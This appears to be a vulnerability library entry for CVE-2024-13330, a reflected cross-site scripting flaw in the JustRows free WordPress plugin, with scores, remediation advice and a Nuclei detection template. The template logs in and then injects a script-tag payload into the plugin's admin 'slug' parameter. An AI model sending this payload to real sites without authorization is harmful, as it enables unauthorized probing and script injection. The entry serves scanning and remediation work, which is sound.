/Vulnerability Library

JustRows WordPress - Cross-Site Scripting

CVE-2024-13330
Verified

Description

JustRows free WordPress plugin v0.2 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious link.

Severity

High

CVSS Score

7.1

Exploit Probability

2%

Affected Product

justrows_free

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-13330.yaml
id: CVE-2024-13330

info:
  name: JustRows WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    JustRows free WordPress plugin v0.2 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version where the vulnerability is fixed, or implement proper sanitization and escaping of output.
  reference:
    - https://wpscan.com/vulnerability/b0360650-8c7a-4e17-8618-b5ef1c71ccbf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13330
    cwe-id: CWE-79
    epss-score: 0.01771
    epss-percentile: 0.82882
    cpe: cpe:2.3:a:canaveralstudio:justrows_free:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: canaveralstudio
    product: justrows_free
    publicwww-query: "/plugins/justrows-free/"
  tags: cve,cve2024,canaveralstudio,justrows-free,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=justrows-edit&slug=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","justrows-free")
        condition: and
# digest: 490a0046304402205d2f4fc0cea39224144251925349b5e823ff93475f9ff4056ef907f34d21e378022061c04385968ad1fd0b48308f6e64b603501f48a299416b6942eb20ad90e25ca8:922c64590222798bb761d5b6d8e72950
7.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
CVE ID:
cve-2024-13330
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/b0360650-8c7a-4e17-8618-b5ef1c71ccbf/

Remediation Steps

Update to the latest version where the vulnerability is fixed, or implement proper sanitization and escaping of output.